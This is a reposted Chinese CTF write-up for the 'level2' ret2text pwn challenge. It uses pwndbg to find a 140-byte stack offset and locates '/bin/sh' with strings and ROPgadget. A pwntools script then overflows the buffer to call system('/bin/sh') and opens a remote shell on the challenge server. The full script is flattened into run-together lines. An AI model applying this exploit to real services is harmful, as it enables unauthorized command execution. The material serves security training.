从零开始做题:逆向 ret2text level2

2024-01-21 10:36
文章标签 从零开始 逆向 level2 ret2text

本文主要是介绍从零开始做题:逆向 ret2text level2,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

1.题目信息

https://adworld.xctf.org.cn/challenges/list

2.解题分析 

2.1 ida发现使用了system函数进行输出

 

2.2 gdb无法进行调试

root@pwn_test1604:/ctf/work/4# gdb ./level2 
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 171 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./level2...(no debugging symbols found)...done.
pwndbg> r
Starting program: /ctf/work/4/level2 
[New process 336]
process 336 is executing new program: /bin/dash
Input:
[Inferior 2 (process 336) exited normally]
pwndbg>

 2.3 解决gdb无法调试

pwndbg> set follow-fork-mode parent
 

root@pwn_test1604:/ctf/work/4# gdb ./level2 
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 171 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./level2...(no debugging symbols found)...done.
pwndbg> set follow-fork-mode parent
pwndbg> r
Starting program: /ctf/work/4/level2 
Input:

pwndbg> cyclic 400
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaad


2.4 得到EIP的值

pwndbg> r
Starting program: /ctf/work/4/level2 
Input:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadProgram received signal SIGSEGV, Segmentation fault.
0x6261616b in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────[ REGISTERS ]───────────────────────────────────────EAX  0x100EBX  0x0ECX  0xffffd680 ◂— 0x61616161 ('aaaa')EDX  0x100EDI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0ESI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0EBP  0x6261616a ('jaab')ESP  0xffffd710 ◂— 'laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'EIP  0x6261616b ('kaab')
────────────────────────────────────────[ DISASM ]─────────────────────────────────────────
Invalid address 0x6261616b─────────────────────────────────────────[ STACK ]─────────────────────────────────────────
00:0000│ esp  0xffffd710 ◂— 'laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
01:0004│      0xffffd714 ◂— 'maabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
02:0008│      0xffffd718 ◂— 'naaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
03:000c│      0xffffd71c ◂— 'oaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
04:0010│      0xffffd720 ◂— 'paabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
05:0014│      0xffffd724 ◂— 'qaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
06:0018│      0xffffd728 ◂— 'raabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
07:001c│      0xffffd72c ◂— 'saabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
───────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────► f 0 6261616bf 1 6261616cf 2 6261616df 3 6261616ef 4 6261616ff 5 62616170f 6 62616171f 7 62616172f 8 62616173f 9 62616174f 10 62616175
Program received signal SIGSEGV (fault address 0x6261616b)
pwndbg> oaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaad
Undefined command: "oaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaad".  Try "help".
pwndbg>

2.5 查看kaab对应的值

pwndbg> cyclic -l kaab
140
pwndbg> 
 

2.6 查看strings内容

方法1.通过IDA查看

 

 方法2.通过linux strings、ROPgadget 查看

root@pwn_test1604:/ctf/work/4# strings ./level2
root@pwn_test1604:/ctf/work/4# ROPgadget --binary ./level2 --string "/bin/sh"
 

root@pwn_test1604:/ctf/work/4# strings ./level2
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
read
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh 
t$,U
[^_]
echo Input:
echo 'Hello World!'
;*2$"
/bin/sh
GCC: (Ubuntu 5.2.1-22ubuntu2) 5.2.1 20151010
GCC: (Ubuntu 4.9.2-10ubuntu11) 4.9.2
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
crtstuff.c
__JCR_LIST__
deregister_tm_clones
register_tm_clones
__do_global_dtors_aux
completed.7181
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
level2.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
read@@GLIBC_2.0
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
data_start
_edata
_fini
vulnerable_function
__data_start
system@@GLIBC_2.0
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
_end
_start
_fp_hw
__bss_start
main
hint
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
_init
root@pwn_test1604:/ctf/work/4# ROPgadget --binary ./level2 --string "/bin/sh"
Strings information
============================================================
0x0804a024 : /bin/sh
root@pwn_test1604:/ctf/work/4#

3.解题脚本

3.1只用修改的内容

BIN   ='./level2'
HOST  ='pwn2.jarvisoj.com'
PORT  =9878
 

def exploit(p):

    p.recv()
    pl = 140*'a'+p32(elf.plt['system'])
    pl += 'aaaa'
    pl += p32(0x0804a024)
    p.sendline(pl)
    p.interactive()
    return

3.2全部脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-from pickle import TRUE
from pwn import *
import syscontext.terminal=["tmux","sp","-h"]
context.log_level='debug'DEBUG = 1LOCAL = True
BIN   ='./level2'
HOST  ='pwn2.jarvisoj.com'
PORT  =9878def get_base_address(proc):return int(open("/proc/{}/maps".format(proc.pid), 'rb').readlines()[0].split('-')[0], 16)def debug(bps,_s):script = "handle SIGALRM ignore\n"PIE = get_base_address(p)script += "set $_base = 0x{:x}\n".format(PIE)for bp in bps:script += "b *0x%x\n"%(PIE+bp)script += _sgdb.attach(p,gdbscript=script)# pwn,caidan,leak,libc
# recv recvuntil send sendline sendlineafter sendafterdef exploit(p):p.recv()pl = 140*'a'+p32(elf.plt['system'])pl += 'aaaa'pl += p32(0x0804a024)p.sendline(pl)p.interactive()returnif __name__ == "__main__":elf = ELF(BIN)if len(sys.argv) > 1:LOCAL = Falsep = remote(HOST, PORT)exploit(p)else:LOCAL = Truep = process(BIN)log.info('PID: '+ str(proc.pidof(p)[0]))# pauseif DEBUG:debug([],"")exploit(p)

3.3 运行本地level2

需要先运行tmux命令

root@pwn_test1604:/ctf/work/4# python level2.py                                                          │ EIP  0xf7f16589 (__kernel_vsyscall+9) ◂— pop    ebp
[DEBUG] PLT 0x8048310 read                                                                               │───────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────
[DEBUG] PLT 0x8048310 read                                                                               │ ► 0xf7f16589 <__kernel_vsyscall+9>     pop    ebp
[DEBUG] PLT 0x8048320 system                                                                             │   0xf7f1658a <__kernel_vsyscall+10>    pop    edx
[DEBUG] PLT 0x8048330 __gmon_start__                                                                     │   0xf7f1658b <__kernel_vsyscall+11>    pop    ecx
[DEBUG] PLT 0x8048340 __libc_start_main                                                                  │   0xf7f1658c <__kernel_vsyscall+12>    ret    
[*] '/ctf/work/4/level2'                                                                                 │    ↓Arch:     i386-32-little                                                                             │   0xf7e27b23 <__read_nocancel+25>      pop    ebxRELRO:    Partial RELRO                                                                              │   0xf7e27b24 <__read_nocancel+26>      cmp    eax, 0xfffff001Stack:    No canary found                                                                            │   0xf7e27b29 <__read_nocancel+31>      jae    __syscall_error <0xf7d6a730>NX:       NX enabled                                                                                 │    ↓PIE:      No PIE (0x8048000)                                                                         │   0xf7d6a730 <__syscall_error>         call   __x86.get_pc_thunk.dx <0xf7e71b5d>
[+] Starting local process './level2': pid 476                                                           │ 
[*] PID: 476                                                                                             │   0xf7d6a735 <__syscall_error+5>       add    edx, 0x1998cb
[DEBUG] Wrote gdb script to '/tmp/pwnKbKDIl.gdb'                                                         │   0xf7d6a73b <__syscall_error+11>      mov    ecx, dword ptr gs:[0]file ./level2                                                                                        │   0xf7d6a742 <__syscall_error+18>      neg    eaxhandle SIGALRM ignore

 

3.4 运行远程

root@pwn_test1604:/ctf/work/4# python level2.py 1
[DEBUG] PLT 0x8048310 read
[DEBUG] PLT 0x8048320 system
[DEBUG] PLT 0x8048330 __gmon_start__
[DEBUG] PLT 0x8048340 __libc_start_main
[*] '/ctf/work/4/level2'Arch:     i386-32-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x8048000)
[-] Opening connection to pwn2.jarvisoj.com on port 9878: Failed
Traceback (most recent call last):File "level2.py", line 50, in <module>p = remote(HOST, PORT)File "/usr/local/lib/python2.7/dist-packages/pwnlib/tubes/remote.py", line 72, in __init__self.sock   = self._connect(fam, typ)File "/usr/local/lib/python2.7/dist-packages/pwnlib/tubes/remote.py", line 89, in _connectfor res in socket.getaddrinfo(self.rhost, self.rport, fam, typ, 0, socket.AI_PASSIVE):
socket.gaierror: [Errno -3] Temporary failure in name resolution
root@pwn_test1604:/ctf/work/4# python level2.py 1
[DEBUG] PLT 0x8048310 read
[DEBUG] PLT 0x8048320 system
[DEBUG] PLT 0x8048330 __gmon_start__
[DEBUG] PLT 0x8048340 __libc_start_main
[*] '/ctf/work/4/level2'Arch:     i386-32-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x8048000)
[+] Opening connection to pwn2.jarvisoj.com on port 9878: Done
[DEBUG] Received 0x7 bytes:'Input:\n'
[DEBUG] Sent 0x99 bytes:00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│*00000080  61 61 61 61  61 61 61 61  61 61 61 61  20 83 04 08  │aaaa│aaaa│aaaa│ ···│00000090  61 61 61 61  24 a0 04 08  0a                        │aaaa│$···│·│00000099
[*] Switching to interactive mode
$ ls
[DEBUG] Sent 0x3 bytes:'ls\n'
[DEBUG] Received 0xc bytes:'flag\n''level2\n'
flag
level2

 

这篇关于从零开始做题:逆向 ret2text level2的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/629242

相关文章

生信代码入门:从零开始掌握生物信息学编程技能

生信代码入门:从零开始掌握生物信息学编程技能

少走弯路,高效分析;了解生信云,访问 【生信圆桌x生信专用云服务器】 : www.tebteb.cc 介绍 生物信息学是一个高度跨学科的领域,结合了生物学、计算机科学和统计学。随着高通量测序技术的发展,海量的生物数据需要通过编程来进行处理和分析。因此,掌握生信编程技能,成为每一个生物信息学研究者的必备能力。 生信代码入门,旨在帮助初学者从零开始学习生物信息学中的编程基础。通过学习常用
阅读更多...
Android逆向(反调,脱壳,过ssl证书脚本)

Android逆向(反调,脱壳,过ssl证书脚本)

文章目录 总结 基础Android基础工具 定位关键代码页面activity定位数据包参数定位堆栈追踪 编写反调脱壳好用的脚本过ssl证书校验抓包反调的脚本打印堆栈bilibili反调的脚本 总结 暑假做了两个月的Android逆向,记录一下自己学到的东西。对于app渗透有了一些思路。 这两个月主要做的是代码分析,对于分析完后的持久化等没有学习。主要是如何反编译源码,如何找到
阅读更多...
BIRT--商业智能和报表工具,从零开始

BIRT--商业智能和报表工具,从零开始

1.简介 BIRT (Business Intelligence and Reporting Tools), 是为 Web 应用程序开发的基于 Eclipse 的开源报表系统,特别之处在于它是以 Java 和 JavaEE 为基础。BIRT 有两个主要组件:基于 Eclipse 的报表设计器,以及部署到应用服务器上的运行时组件。 2.下载 官网下载网址:http://download.ec
阅读更多...
转:android ro.debuggable属性调试修改(mprop逆向)

转:android ro.debuggable属性调试修改(mprop逆向)

android ro属性调试修改(mprop逆向)      大家都知道如果需要调试android 的程序,以下两个条件满足一个就行。第一是apk的配置文件内的AndroidManifest.xml的 android:debuggable=”true”,第二就是/default.prop中ro.debuggable=1。两种方式第一种通常是解包添加属性再打包,随着加壳软件以及apk校验等,容易出
阅读更多...
某里227逆向分析

某里227逆向分析

声明: 该文章为学习使用,严禁用于商业用途和非法用途,违者后果自负,由此产生的一切后果均与作者无关。 本文章未经许可禁止转载,禁止任何修改后二次传播,擅自使用本文讲解的技术而导致的任何意外,作者均不负责,若有侵权,请联系作者立即删除! 前言 这次会简单的讲解阿里227版本滑块参数n的逆向分析流程以及简单的补环境,如果有疑问可以在评论区交流讨论,我看到会及时回复的,另外,有需要可联系我。 一
阅读更多...
从零开始学习JVM(七)- StringTable字符串常量池

从零开始学习JVM(七)- StringTable字符串常量池

1 概述 String应该是Java使用最多的类吧,很少有Java程序没有使用到String的。在Java中创建对象是一件挺耗费性能的事,而且我们又经常使用相同的String对象,那么创建这些相同的对象不是白白浪费性能吗。所以就有了StringTable这一特殊的存在,StringTable叫做字符串常量池,用于存放字符串常量,这样当我们使用相同的字符串对象时,就可以直接从StringTable
阅读更多...
从零开始构建大语言模型并进行微调:全面指南

从零开始构建大语言模型并进行微调:全面指南

要从0开始搭建并训练一个大语言模型(LLM),涉及到多个步骤和资源,包括理论理解、工具使用、数据准备、模型训练与微调。以下是一个从基础到应用的指南,帮助你理解并逐步实现这一目标。 1. 理解基础概念 在开始搭建大语言模型之前,了解以下基本概念至关重要: 生成式AI:通过大语言模型生成自然语言文本,例如GPT、BERT等。机器学习:通过数据训练模型,使其具备从数据中学习规律的能力。深度学习:机
阅读更多...
如何使用 Python 读取 Excel 文件:从零开始的超详细教程

如何使用 Python 读取 Excel 文件:从零开始的超详细教程

“日出东海落西山 愁也一天 喜也一天 遇事不钻牛角尖” 文章目录 前言文章有误敬请斧正 不胜感恩!||Day03为什么要用 Python 读取 Excel 文件?准备工作:安装所需工具安装 Python安装 Pandas安装 openpyxl 使用 Pandas 读取 Excel 文件什么是 Pandas?读取 Excel 文件的简单示例查看数据的前几行选择特定工作表只读取部分列跳过
阅读更多...
【虚拟机/服务器】在Ubuntu Server上从零开始配置Nginx、Mysql、PHP7.0

【虚拟机/服务器】在Ubuntu Server上从零开始配置Nginx、Mysql、PHP7.0

1、升级当前系统数据源 sudo apt-get update && sudo apt-get upgrade 遇到询问是否继续,输入 y 或直接回车继续就好了 2、安装 Nginx sudo apt-get install nginx 安装完成之后就会默认自动开启 Nginx 服务器,可以通过 ps -ef | grep nginx 查看。 3、配置 Nginx 环境 1)替换默认
阅读更多...
从零开始学cv-14:图像边缘检测

从零开始学cv-14:图像边缘检测

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言一、图像边缘是什么?二、Sobel 算子三、Scharr 算子四、Prewitt算子五、Canny算子 前言 边缘检测是OpenCV中的一个重要组成部分,它用于识别图像中亮度变化显著的点,即边缘。通过边缘检测,我们可以从图像中提取出重要的特征,为后续的图像分析、形状识别和物体跟踪等任务奠定
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2